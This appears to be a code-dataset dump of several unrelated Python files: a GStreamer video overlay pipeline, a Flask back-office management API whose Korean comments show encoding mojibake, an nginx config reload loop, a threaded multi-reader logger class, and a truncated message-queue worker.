source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
gst_overlay_pipeline.py | # Based on https://github.com/google-coral/examples-camera/tree/master/gstreamer
import os
import sys
import svgwrite
import threading
import numpy as np
import gi
gi.require_version("Gst", "1.0")
gi.require_version("GstBase", "1.0")
gi.require_version("Gtk", "3.0")
from gi.repository import GLib, GObject, Gst, GstBase, Gtk
GObject.threads_init()
Gst.init(None)
class GstPipeline:
TEMP_OVERLAY_FILENAME = "overlay.png"
def __init__(self, pipeline, user_function):
self.user_function = user_function
self.running = False
self.gstbuffer = None
self.sink_size = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.overlay = self.pipeline.get_by_name("overlay-svg")
if self.overlay is None:
self.overlay = self.pipeline.get_by_name("overlay-image")
self.overlay.set_property("alpha", 0.5)
appsink = self.pipeline.get_by_name("appsink")
appsink.connect("new-sample", self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect("message", self.on_bus_message)
def run(self):
# Start vision worker.
self.running = True
worker = threading.Thread(target=self.vision_loop)
worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
worker.join()
# If an overlay image file was used remove it
if os.path.isfile(self.TEMP_OVERLAY_FILENAME):
os.remove(self.TEMP_OVERLAY_FILENAME)
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write("Warning: %s: %s\n" % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write("Error: %s: %s\n" % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit("pull-sample")
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value("height"), s.get_value("width"))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def vision_loop(self):
local_np_buffer = None
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
local_gst_buffer = self.gstbuffer
self.gstbuffer = None
if local_np_buffer is None:
local_np_buffer = np.zeros((*self.sink_size, 3), dtype=np.uint8)
result, mapinfo = local_gst_buffer.map(Gst.MapFlags.READ)
if result:
local_np_buffer[:] = np.ndarray(
(*self.sink_size, 3), buffer=mapinfo.data, dtype=np.uint8
)
local_gst_buffer.unmap(mapinfo)
overlay = self.user_function(local_np_buffer)
if overlay and self.overlay:
if self.overlay.get_name() == "overlay-svg":
self.overlay.set_property("data", overlay)
else:
overlay.save(self.TEMP_OVERLAY_FILENAME)
self.overlay.set_property(
"location", self.TEMP_OVERLAY_FILENAME
)
def run_pipeline(
user_function,
src_frame_rate: int = None,
src_height: int = None,
src_width: int = None,
binning_level: int = 1,
overlay_element: str = "rsvgoverlay",
image_sink_sub_pipeline: str = "ximagesink sync=false",
):
image_src_element = "pyspinsrc"
if binning_level is not None and binning_level != 1:
image_src_element += f" h-binning={binning_level} v-binning={binning_level}"
image_src_caps = "video/x-raw,format=RGB"
if src_frame_rate is not None:
image_src_caps += f",framerate={int(src_frame_rate)}/1"
if src_height is not None:
image_src_caps += f",height={src_height}"
if src_width is not None:
image_src_caps += f",width={src_width}"
appsink_element = "appsink name=appsink emit-signals=true max-buffers=1 drop=true"
appsink_caps = "video/x-raw,format=RGB"
leaky_queue = "queue max-size-buffers=1 leaky=downstream"
overlay_element += (
" name=overlay-svg"
if overlay_element == "rsvgoverlay"
else " name=overlay-image"
)
pipeline = f""" {image_src_element} ! {image_src_caps} ! tee name=t
t. ! {leaky_queue} ! videoconvert ! {appsink_caps} ! {appsink_element}
t. ! {leaky_queue} ! videoconvert ! {overlay_element} ! videoconvert ! {image_sink_sub_pipeline}
"""
print("Gstreamer pipeline:\n", pipeline)
pipeline = GstPipeline(pipeline, user_function)
pipeline.run()
|
systemMngApi.py | # -*- coding:utf-8 -*-
import json
import os
import threading
from flask import Blueprint, request
from flask.globals import session
from flask.helpers import send_from_directory
from util.common import paramEscape, getApiData, postApiData, getApiSingleData, \
strToLong, deleteApiDataByJson, getParameter, getData, setStringToNumber, \
API_SERVER_BILLINGSERVICE, postData, sendSms, getEnv
from util.common import putApiData, deleteApiData, setNoneToBlank, \
request_get, request_post, request_put, API_SERVER_BACKOFFICE
systemMngApi = Blueprint("systemMngApi", __name__)
@systemMngApi.route("/api/systemMng/employee/passwordChange", methods=['PUT'])
def putPasswordChange():
form_data = request.json
putPasswordData = {
"employeeId" : session['empId'], #String, //์ง์ ID
"beforePassword" : getParameter(form_data,"beforePassword"),
"newPassword" : getParameter(form_data,"newPassword"),
}
print putPasswordData
return json.dumps(putApiData("/employees/employee/password", putPasswordData , {}))
@systemMngApi.route("/api/systemMng/employees", methods=['GET'])
def employeess():
form_data = json.loads(request.args.get("formData"))
name = ""
divisionId = ""
teamId = ""
if "name" in form_data :
name = setNoneToBlank(form_data["name"])
if "divisionId" in form_data :
divisionId = setNoneToBlank(form_data["divisionId"])
if "teamId" in form_data :
teamId = setNoneToBlank(form_data["teamId"])
queryData = {
'limit': setStringToNumber(request.args.get("length")),
'offset': setStringToNumber(request.args.get("start")),
'name': name,
'division': divisionId,
'team': teamId,
}
result_data = getApiData("/employees" ,queryData)
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/employee/auth-list", methods=['GET'])
def auths():
form_data = ""
if request.args.get("formData") is not None :
form_data = json.loads(request.args.get("formData"))
queryData = {
'empId' : getParameter(form_data,"empId"),
'menuName' : getParameter(form_data,"menuName"),
'parMenuId' : getParameter(form_data,"parMenuId"),
}
resultData = request_get("/employee/auth-list", queryData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
@systemMngApi.route("/api/systemMng/employees/employee", methods=['POST','GET', "PUT", "DELETE"])
def employees():
if (request.method == 'GET') :
return getEmployees()
elif (request.method == 'POST') :
return postemployees()
elif (request.method == 'PUT') :
return putemployees()
elif (request.method == 'DELETE') :
return deleteemployees()
def postemployees():
form_data = request.json
postRepresentData = {
"employeeId" : getParameter(form_data,"employeeId"), #String, //์ฌ์๋ฒํธ
"divisionId" : getParameter(form_data,"divisionId"), #String, //๋ถ์ ID
"teamId" : getParameter(form_data,"teamId" ), #String, //ํ ID
"name" : getParameter(form_data,"name" ), #String, //์ด๋ฆ
"password" : getParameter(form_data , "password"), #String,
"position" : getParameter(form_data,"position"), #String, //์ง์
"birthDate" : paramEscape(form_data["birthDate"]), #String, //์๋
์์ผ
"gender" : getParameter(form_data,"gender"), #String, //์ฑ๋ณ
"phone" : paramEscape(form_data["phone"]), #String, //ํด๋์ ํ
"email" : getParameter(form_data,"email"), #String, //์ด๋ฉ์ผ
"enteringDate" : paramEscape(getParameter(form_data,"enteringDate")), #String //์
์ฌ์ผ์
"createId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/employees/employee", postRepresentData))
def putemployees():
form_data = request.json
putRepresentData = {
"employeeId" : form_data["employeeId" ], #String, //์ง์ ID
"divisionId" : form_data["divisionId" ], #String, //๋ถ์ ID
"teamId" : form_data["teamId" ], #String, //ํ ID
"name" : form_data["name" ], #String, //์ด๋ฆ
"position" : form_data["position" ], #String, //์ง์
"birthDate" : paramEscape(form_data["birthDate"]), #String, //์๋
์์ผ
"gender" : form_data["gender" ], #String, //์ฑ๋ณ
"phone" : paramEscape(form_data["phone"]), #String, //ํด๋์ ํ
"email" : form_data["email" ], #String, //์ด๋ฉ์ผ
"enteringDate" : paramEscape(form_data["enteringDate"]), #String //์
์ฌ์ผ์
"leaveDate" : paramEscape(form_data["leaveDate"]), #String //ํด์ฌ์ผ์
"updateId" :session['empId'] # ์์ ์
}
result = json.dumps(putApiData("/employees/employee", putRepresentData , {}))
sendSmsPhoneNo = getData("/employees/sendSmsPhoneNo", {"recieverId":form_data["employeeId" ], "senderId":session['empId']})
print getEnv()
if "code" not in sendSmsPhoneNo:
if getEnv() != "DEV" :
recieverPhone = sendSmsPhoneNo["recieverPhone"]
recieverName = sendSmsPhoneNo["recieverName"]
senderPhone = sendSmsPhoneNo["senderPhone"]
senderName = sendSmsPhoneNo["senderName"]
managerPhone = sendSmsPhoneNo["managerPhone"]
# if getEnv() == "DEV" :
# recieverPhone = '01088966045'
# senderPhone = '01088966045'
# managerPhone = '01088966045'
smsMsg = "[R2] "+ senderName + "๋์ด " + recieverName + "๋์ ์ง์์ ๋ณด๋ฅผ ๋ณ๊ฒฝํ์์ต๋๋ค."
sendSms(recieverPhone , smsMsg)
if recieverPhone != senderPhone :
sendSms(senderPhone , smsMsg)
if recieverPhone != managerPhone and senderPhone != managerPhone and managerPhone != None:
sendSms(managerPhone , smsMsg)
# ๋ฌธ์ ๋ฉ์์ง ์ ์ก
return result
def deleteemployees():
print request.args.get("employeeId")
queryData = {
'employeeId': setNoneToBlank(request.args.get("employeeId")),
}
return json.dumps(deleteApiData("/employees/employee", queryData))
def getEmployees():
param = {
"employeeId" : setNoneToBlank(request.args.get("employeeId")),
"name" : setNoneToBlank(request.args.get("name")),
"email" : setNoneToBlank(request.args.get("email")),
}
result_data = getApiSingleData("/employees/employee" ,param)
print result_data
return json.dumps(result_data)
def getEmployee(employeeId):
param = {
"employeeId" : setNoneToBlank(employeeId),
"name" : "",
"email" : "",
}
result_data = getApiSingleData("/employees/employee" ,param)
print result_data
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/menus", methods=['GET'])
def menus():
form_data = ""
if request.args.get("formData") is not None :
form_data = json.loads(request.args.get("formData"))
queryData = {
'name' : getParameter(form_data,"name"),
'menuId' : getParameter(form_data,"menuId"),
'parMenuId' : getParameter(form_data,"parMenuId"),
'selType' : getParameter(form_data,"selType"),
}
print queryData
result_data = getApiData("/systemMng/menus" ,queryData)
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/menus/menu", methods=['POST','GET', "PUT", "DELETE"])
def menu():
if (request.method == 'GET') :
return getEmployees()
elif (request.method == 'POST') :
return postMenu()
elif (request.method == 'PUT') :
return putMenu()
elif (request.method == 'DELETE') :
return deleteMenu()
def postMenu():
form_data = request.json
postRepresentData = {
"menuId" : form_data["menuId" ], #String, // ๋ฉ๋ด ID
"name" : form_data["name" ], #String, // ๋ฉ๋ด ๋ช
"parMenuId" : form_data["parMenuId" ], #String, // ์์ ๋ฉ๋ด ID
"menuUrl" : form_data["menuUrl" ], #String, // ๋ฉ๋ด URL
"createId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/systemMng/menus/menu", postRepresentData))
def putMenu():
form_data = request.json
postRepresentData = {
"menuId" : form_data["menuId" ], #String, // ๋ฉ๋ด ID
"name" : form_data["name" ], #String, // ๋ฉ๋ด ๋ช
"parMenuId" : form_data["parMenuId" ], #String, // ์์ ๋ฉ๋ด ID
"menuUrl" : form_data["menuUrl" ], #String, // ๋ฉ๋ด URL
"updateId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(putApiData("/systemMng/menus/menu", postRepresentData, ""))
def deleteMenu():
form_data = request.json
postRepresentData = {
"menuId" : form_data["menuId" ], #String, // ๋ฉ๋ด ID
"name" : form_data["name" ], #String, // ๋ฉ๋ด ๋ช
"parMenuId" : form_data["parMenuId" ], #String, // ์์ ๋ฉ๋ด ID
"menuUrl" : form_data["menuUrl" ], #String, // ๋ฉ๋ด URL
"updateId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(deleteApiDataByJson("/systemMng/menus/menu", postRepresentData))
@systemMngApi.route("/api/systemMng/employee/auth", methods=['POST'])
def postEemployeeAuth():
formData = request.json
for data in formData :
data["createId"] = session['empId']
data["updateId"] = session['empId']
resultData = request_post("/employee/auth", formData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
@systemMngApi.route("/api/systemMng/menus/menuSubUrl", methods=['POST','GET', "PUT", "DELETE"])
def menuSubUrl():
if (request.method == 'GET') :
return getMenuSubUrl()
elif (request.method == 'POST') :
return postMenuSubUrl()
elif (request.method == 'PUT') :
return putMenuSubUrl()
elif (request.method == 'DELETE') :
return deleteMenuSubUrl()
def postMenuSubUrl():
data = request.json
postRepresentData = {
"parMenuId" : getParameter(data , "parMenuId" ), #String, // ๋ฉ๋ด ID
"name" : getParameter(data , "name" ), #String, // ๋ฉ๋ด ๋ช
"url" : getParameter(data , "url" ), #String, // ๋ฉ๋ด URL
"createId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/systemMng/menus/menuSubUrl", postRepresentData))
def getMenuSubUrl():
param = {
"parMenuId" : getParameter({} ,"parMenuId"),
}
result_data = getData("/systemMng/menus/menuSubUrl" ,param)
print result_data
return json.dumps(result_data)
def deleteMenuSubUrl():
queryData = {
'urlId': getParameter(request.json ,"urlId"),
}
return json.dumps(deleteApiData("/systemMng/menus/menuSubUrl", queryData))
def putMenuSubUrl():
data = request.json
postRepresentData = {
"urlId" : getParameter(data,"urlId"), #String, // seq
"url" : getParameter(data,"url" ), #String, // URL
"name" : getParameter(data,"name" ), #String, // ํ๋ฉด๋ช
"updateId" : session['empId'] #String //์์ ์ ID
}
return json.dumps(putApiData("/systemMng/menus/menuSubUrl", postRepresentData, ""))
@systemMngApi.route("/api/systemMng/common/commonCodes", methods=['GET'])
def commonCodes():
form_data = ""
if request.args.get("formData") is not None :
form_data = json.loads(request.args.get("formData"))
queryData = {
'typeCode': getParameter(form_data,"type"),
'code': getParameter(form_data,"code"),
'codeName': getParameter(form_data,"name")
}
result_data = getApiData("/systemMng/common/commonCodes" ,queryData)
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/common/commonCodeList", methods=['GET'])
def commonCodeList():
form_data = ""
if request.args.get("formData") is not None :
form_data = json.loads(request.args.get("formData"))
typeCode = getParameter(form_data,"type").split(",")
result_data = []
for typeC in typeCode:
queryData = {
'typeCode': typeC,
'code': getParameter(form_data,"code"),
'codeName': getParameter(form_data,"name")
}
result_data.append(getData("/systemMng/common/commonCodes" ,queryData))
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/common/typeCodes", methods=['GET'])
def typeCodes():
queryData = {
'typeCode': getParameter({},"typeCode"),
}
result_data = getData("/systemMng/common/typeCodes" ,queryData)
return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/common/commonCode", methods=['POST','GET', "DELETE"])
def commonCode():
if (request.method == 'POST') :
return postCommonCode()
elif (request.method == 'DELETE') :
return deleteCommonCode()
def postCommonCode():
data = request.json
postRepresentData = {
"typeCode" : getParameter(data , "typeCode" ), #String, // ๋ฉ๋ด ID
"code" : getParameter(data , "code" ), #String, // ๋ฉ๋ด ๋ช
"codeName" : getParameter(data , "codeName" ), #String, // ๋ฉ๋ด ๋ช
"descText" : getParameter(data , "descText" ), #String, // ๋ฉ๋ด URL
"createId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/systemMng/common/commonCode", postRepresentData))
def deleteCommonCode():
data = request.json
queryData = {
"typeCode" : getParameter(data , "typeCode" ), #String, // ๋ฉ๋ด ID
"code" : getParameter(data , "code" ), #String, // ๋ฉ๋ด ๋ช
"codeName" : getParameter(data , "codeName" ), #String, // ๋ฉ๋ด ๋ช
"descText" : getParameter(data , "descText" ), #String, // ๋ฉ๋ด URL
"createId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(deleteApiDataByJson("/systemMng/common/commonCode", queryData))
@systemMngApi.route("/api/systemMng/common/systemHistory", methods=["GET", "POST"])
def systemHistory():
if (request.method == 'GET') :
return getSystemHistory()
elif (request.method == 'POST') :
return postSystemHistory()
def getSystemHistory():
queryData = {
'menuId': getParameter({},"menuId"),
'desc1': getParameter({},"desc1"),
'desc3': getParameter({},"desc2"),
'desc2': getParameter({},"desc3"),
'start': getParameter({},"start"),
'length': getParameter({},"length"),
}
return json.dumps(getApiData("/systemMng/common/systemHistory", queryData))
@systemMngApi.route("/api/systemMng/common/systemHistory", methods=["PUT"])
def postSystemHistory():
data = request.json
queryData = {
'menuId': getParameter(data,"menuId"),
'typeCode': getParameter(data,"typeCode"),
'desc1': getParameter(data,"desc1"),
'desc2': getParameter(data,"desc2"),
'desc3': getParameter(data,"desc3"),
"regId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/systemMng/common/systemHistory", queryData))
@systemMngApi.route("/api/systemMng/common/batchMngs", methods=["GET"])
def batchMngs():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
# ๊ด๋ฆฌ์๋ id์์ด ์กฐํ ํ๋๋ก ํ ์์
'limit': setStringToNumber(request.args.get("length")),
'offset': setStringToNumber(request.args.get("start")),
'reqId': session['empId'],
'startDate': startDate,
'endDate': endDate,
'status': getParameter(form_data,"status"),
}
return json.dumps(getApiData("/systemMng/common/batchMngs", queryData))
def postBatchMng(queryData):
return postApiData("/systemMng/common/batchMng", queryData)
def putBatchMng(queryData):
return putApiData("/systemMng/common/batchMng", queryData , "")
@systemMngApi.route("/api/systemMng/common/batchMng", methods=["GET"])
def batchMng():
queryData = {
"seq" : getParameter({}, "seq"),
"reqId" : session['empId']
}
batchData = getData("/systemMng/common/batchMng", queryData)
filePath = setNoneToBlank(batchData["filePath"])
slashPosition = filePath.replace('\\', '/').rindex('/')
folderPath = filePath[:slashPosition]
fileName = filePath[slashPosition + 1 :]
return send_from_directory(directory=folderPath , filename = fileName , as_attachment = True)
@systemMngApi.route("/api/systemMng/common/batchMng", methods=["POST"])
def deleteBatchMng():
formData = request.json
seq = getParameter(formData, "seq")
queryData = {
"seq" : seq,
"reqId" : session['empId']
}
batchData = getData("/systemMng/common/batchMng", queryData)
filePath = setNoneToBlank(batchData["filePath"])
print filePath
if filePath != "" :
if os.path.isfile(filePath):
os.remove(filePath)
return json.dumps(deleteApiData("/systemMng/common/batchMng", queryData))
@systemMngApi.route("/api/systemMng/common/tableColumnMng", methods=['POST'])
def postTableColumnMng():
formData = request.json
postRepresentData = {
"menuId" : getParameter(formData,"menuId"),
"empId" : session['empId'],
"tableId" : getParameter(formData,"tableId"),
"descText" : getParameter(formData,"descText"),
"createId" : session['empId']
}
print postRepresentData
return json.dumps(postApiData("/systemMng/common/tableColumnMng", postRepresentData))
@systemMngApi.route("/api/systemMng/common/getTableColumnMng", methods=['POST'])
def getTableColumnMng():
formData = request.json
data = {
"menuId" : getParameter(formData,"menuId"),
"empId" : session['empId'],
"tableId" : getParameter(formData,"tableId")
}
print data
return json.dumps(getData("/systemMng/common/tableColumnMng", data))
def postCommonSystemHistory(data):
queryData = {
'menuId' : data["menuId"],
'typeCode': data["typeCode"],
'desc1': data["desc1"],
'desc2': data["desc2"],
'desc3': data["desc3"],
"regId" : session['empId'] #String //๋ฑ๋ก์ ID
}
return json.dumps(postApiData("/systemMng/common/systemHistory", queryData))
@systemMngApi.route("/api/systemMng/common/settlement", methods=['POST'])
def inconsistencyInq():
form_data = request.json
queryData = {
"jobDivider" : getParameter(form_data,"jobDivider"),
'settleDate': paramEscape(getParameter(form_data,"settleDate")),
}
jobType = getParameter(form_data,"jobType")
t1 = threading.Thread(target=settlementJob,args=[queryData,jobType])
t1.daemon = True
t1.start()
return json.dumps({"message" : "์ฑ๊ณต"})
def settlementJob(queryData,jobType):
if jobType == "UPLOAD" :
postData("/v1/settlement/upload", queryData , queryData , API_SERVER_BILLINGSERVICE)
elif jobType == "DOWNLOAD" :
postData("/v1/settlement/download", queryData , queryData , API_SERVER_BILLINGSERVICE)
else :
postData("/v1/settlement", queryData , queryData, API_SERVER_BILLINGSERVICE)
|
vms_nginx_listen.py | # coding: utf-8
#------------------------------
# [ไป]ๆๅกๅจไธๆฅ
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
root_dir = os.getcwd()
sys.path.append(root_dir + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if run_model == '2' and run_is_master == '1':
return True
return False
#------------Private Methods--------------
def reloadNingx():
_list = common.M('kv', 'video').field(
'name,value').field('name,value').select()
kv = {}
for i in xrange(0, len(_list)):
kv[_list[i]['name']] = _list[i]['value']
if kv['nginx_domain'] == '':
return False
if not os.path.exists(kv['nginx_www']):
return False
if not os.path.exists(kv['nginx_video_www']):
return False
if kv['nginx_listen'] == '1' and os.path.exists(kv['nginx_path']):
content = common.readFile('data/nginx_vms.tpl')
content_to = common.readFile(kv['nginx_path'])
domain_list = kv['nginx_domain'].split()
ng_donmain = ' '.join(domain_list)
content = content.replace('{$NG_DOMAIN}', ng_donmain)
content = content.replace('{$NG_WWW}', kv['nginx_www'])
content = content.replace('{$NG_VIDEO_WWW}', kv['nginx_video_www'])
if kv['nginx_domain_acl'] != '':
nginx_domain_acl = kv['nginx_domain_acl'].split()
ng_donmain_acl = ','.join(nginx_domain_acl)
content = content.replace('{$NG_DOAMIN_ACL}', ng_donmain_acl)
else:
content = content.replace('{$NG_DOAMIN_ACL}', '*')
nginx_bin = [
'/Applications/mdserver/bin/openresty/bin/nginx'
'/www/server/nginx/bin/nginx'
]
if common.md5(content) != common.md5(content_to):
common.writeFile(kv['nginx_path'], content)
for x in nginx_bin:
if os.path.exists(x):
cmd = x + ' -s reload'
print common.execShell(cmd)
return True
def serverNingx():
while True:
reloadNingx()
time.sleep(10)
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
t = threading.Thread(target=serverNingx)
t.setDaemon(True)
t.start()
startTask()
|
composed_reader.py | #!/usr/bin/env python3
import logging
import sys
import threading
import time
sys.path.append('.')
from logger.readers.reader import Reader
from logger.transforms.transform import Transform
from logger.utils import formats
# How long to a reader thread should lie dormant before shutting down
# and counting on getting restarted again if/when needed. We need this
# so that our readers eventually terminate.
READER_TIMEOUT_WAIT = 0.25
################################################################################
class ComposedReader(Reader):
"""
Read lines from one or more Readers (in parallel) and process their
responses through zero or more Transforms (in series).
NOTE: we make the rash assumption that transforms are thread-safe,
that is, that no mischief or corrupted internal state will result if
more than one thread calls a transform at the same time. To be
thread-safe, a transform must protect any changes to its internal
state with a non-re-entrant thread lock, as described in the threading
module.
Also NOTE: Most of the messy logic in this class comes from the desire
to only call read() on our component readers when we actually need new
records (NOTE: this desire may be misplaced!).
So when we get a request, we fire up threads and ask each of our
readers for a record. We return the first one we get, and let the
others pile up in a queue that we'll feed from the next time we're
asked.
But we don't want to fire up a new thread for each reader every time
the queue is empty, so we have threads (in run_reader()) hang out for
a little while, waiting for another queue_needs_record event. If they
get one, the call their own read() methods again. If they haven't been
called on in READER_TIMEOUT_WAIT seconds, they exit, but will get
fired up again by read() if/when the queue is empty and we're is asked
for another record.
It's important to have the run_reader threads time out, or any process
using a ComposedReader will never naturally terminate.
"""
############################
def __init__(self, readers, transforms=[], check_format=False):
"""
Instantiation:
reader = ComposedReader(readers, transforms=[], check_format=True)
readers A single Reader or a list of Readers.
transforms A single Transform or list of zero or more Transforms.
check_format If True, attempt to check that Reader/Transform formats
are compatible, and throw a ValueError if they are not.
If check_format is False (the default) the output_format()
of the whole reader will be formats.Unknown.
Use:
record = reader.read()
Sample:
reader = ComposedReader(readers=[NetworkReader(':6221'),
NetworkReader(':6223')],
transforms=[TimestampTransform()])
"""
# Make readers a list, even if it's only a single reader.
self.readers = readers if type(readers) == type([]) else [readers]
self.num_readers = len(self.readers)
# Transforms can be empty. But if not empty, make it a list, even
# if it's only a single transform.
if not type(transforms) == type([]):
self.transforms = [transforms]
else:
self.transforms = transforms
# If they want, check that our readers and transforms have
# compatible input/output formats.
output_format = formats.Unknown
if check_format:
output_format = self._check_reader_formats()
if not output_format:
raise ValueError('ComposedReader: No common output format found '
'for passed readers: %s' % [r.output_format()
for r in self.readers])
super().__init__(output_format=output_format)
# List where we're going to store reader threads
self.reader_threads = [None] * self.num_readers
# Whether reader[i] has returned EOF since we've last asked it
self.reader_returned_eof = [False] * self.num_readers
# One lock per reader, to save us from accidental re-entry
self.reader_locks = [threading.Lock() for i in range(self.num_readers)]
# Queue where we'll store extra records, and lock so only one
# thread can touch queue at a time
self.queue = []
self.queue_lock = threading.Lock()
# The two events, queue_has_record and queue_needs_record interact
# in a sort of a dance:
#
# has = False, need = False: Everything is quiescent
# has = False, need = True: A request has been made, call readers
# has = True, need = True: Momentary condition when we get needed rec
# has = True, need = False: We've got spare records in the queue
#
# Set when the queue is empty and we need a record
self.queue_needs_record = threading.Event()
# Set when a reader adds something to the queue
self.queue_has_record = threading.Event()
############################
def read(self):
"""
Get the next record from queue or readers.
"""
# If we only have one reader, there's no point making things
# complicated. Just read, transform, return.
if len(self.readers) == 1:
return self._apply_transforms(self.readers[0].read())
# Do we have anything in the queue? Note: safe to check outside of
# lock, because we're the only method that actually *removes*
# anything. So if tests True here, we're assured that there's
# something there, and we lock before retrieving it. Advantage of
# doing it this way is that we don't tie up queue lock while
# processing transforms.
if self.queue:
logging.debug('read() - read requested; queue len is %d', len(self.queue))
with self.queue_lock:
record = self.queue.pop(0)
return self._apply_transforms(record)
# If here, nothing's in the queue. Note that, if we wanted to be
# careful to never unnecessarily ask for more records, we should
# put a lock around this, but the failure mode is somewhat benign:
# we ask for more records when some are already on the way.
logging.debug('read() - read requested and nothing in the queue.')
# Some threads may have timed out while waiting to be called to
# action; restart them.
for i in range(len(self.readers)):
if not self.reader_threads[i] or not self.reader_threads[i].is_alive():
logging.info('read() - starting thread for Reader #%d', i)
self.reader_returned_eof[i] = False
thread = threading.Thread(target=self._run_reader, args=(i,))
self.reader_threads[i] = thread
thread.start()
# Now notify all threads that we do in fact need a record.
self.queue_needs_record.set()
# Keep checking/sleeping until we've either got a record in the
# queue or all readers have given us an EOF.
while False in self.reader_returned_eof:
logging.debug('read() - waiting for queue lock')
with self.queue_lock:
logging.debug('read() - acquired queue lock, queue length is %d',
len(self.queue))
if self.queue:
record = self.queue.pop(0)
if not self.queue:
self.queue_has_record.clear() # only set/clear inside queue_lock
logging.debug('read() - got record')
return self._apply_transforms(record)
else:
self.queue_has_record.clear()
# If here, nothing in queue yet. Wait
logging.debug('read() - clear of queue lock, waiting for record')
self.queue_has_record.wait(READER_TIMEOUT_WAIT)
if not self.queue_has_record.is_set():
logging.debug('read() - timed out waiting for record. Looping')
logging.debug('read() - readers returned EOF: %s',
self.reader_returned_eof)
# All readers have given us an EOF
logging.debug('read() - all threads returned None; returning None')
return None
############################
def _run_reader(self, index):
"""
Cycle through reading records from a readers[i] and putting them in queue.
"""
while True:
logging.debug(' Reader #%d waiting until record needed.', index)
self.queue_needs_record.wait(READER_TIMEOUT_WAIT)
# If we timed out waiting for someone to need a record, go
# home. We'll get started up again if needed.
if not self.queue_needs_record.is_set():
logging.debug(' Reader #%d timed out - exiting.', index)
return
# Else someone needs a record - leap into action
logging.debug(' Reader #%d waking up - record needed!', index)
# Guard against re-entry
with self.reader_locks[index]:
record = self.readers[index].read()
# If reader returns None, it's done and has no more data for
# us. Note that it's given us an EOF and exit.
if record is None:
logging.info(' Reader #%d returned None, is done', index)
self.reader_returned_eof[index] = True
return
logging.debug(' Reader #%d has record, released reader_lock.', index)
# Add record to queue and note that an append event has
# happened.
with self.queue_lock:
# No one else can mess with queue while we add record. Once we've
# added it, set flag to say there's something in the queue.
logging.debug(' Reader #%d has queue lock - adding and notifying.',
index)
self.queue.append(record)
self.queue_has_record.set()
self.queue_needs_record.clear()
# Now clear of queue_lock
logging.debug(' Reader #%d released queue_lock - looping', index)
############################
def _apply_transforms(self, record):
"""
Apply the transforms in series.
"""
if record:
for t in self.transforms:
record = t.transform(record)
if not record:
break
return record
############################
def _check_reader_formats(self):
"""
Check that Reader outputs are compatible with each other and with
Transform inputs. Return None if not.
"""
# Find the lowest common format among readers
lowest_common = self.readers[0].output_format()
for reader in self.readers:
lowest_common = reader.output_format().common(lowest_common)
if not lowest_common:
return None
logging.debug('Lowest common format for readers is "%s"', lowest_common)
if not self.transforms:
return lowest_common
# Now check the transforms in series - output of each is input of
# next one.
for transform in self.transforms:
if not transform.input_format().can_accept(lowest_common):
logging.error('Transform %s can not accept input format %s',
transform, lowest_common)
return None
lowest_common = transform.output_format()
# Our final format is the lowest common format from last transform
return lowest_common
|
Temple.py | # coding=utf-8
# Copyright 2019 StrTrek Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# System Required
import time
import logging
from multiprocessing import Process, Pipe, Queue
# Outer Required
# Inner Required
from Babelor.Presentation import URL
from Babelor.Session import MQ
from Babelor.Data import SQL, FTP, FTPD, TOMAIL, FILE
# Global Parameters
from Babelor.Config import CONFIG
def priest(conn: URL, queue_ctrl: Queue, pipe_in: Pipe):
mq = MQ(conn)
is_active = queue_ctrl.get()
while is_active:
if queue_ctrl.empty():
msg_in = mq.pull()
logging.info("TEMPLE::{0} pull:{1}".format(conn, msg_in))
pipe_in.send(msg_in)
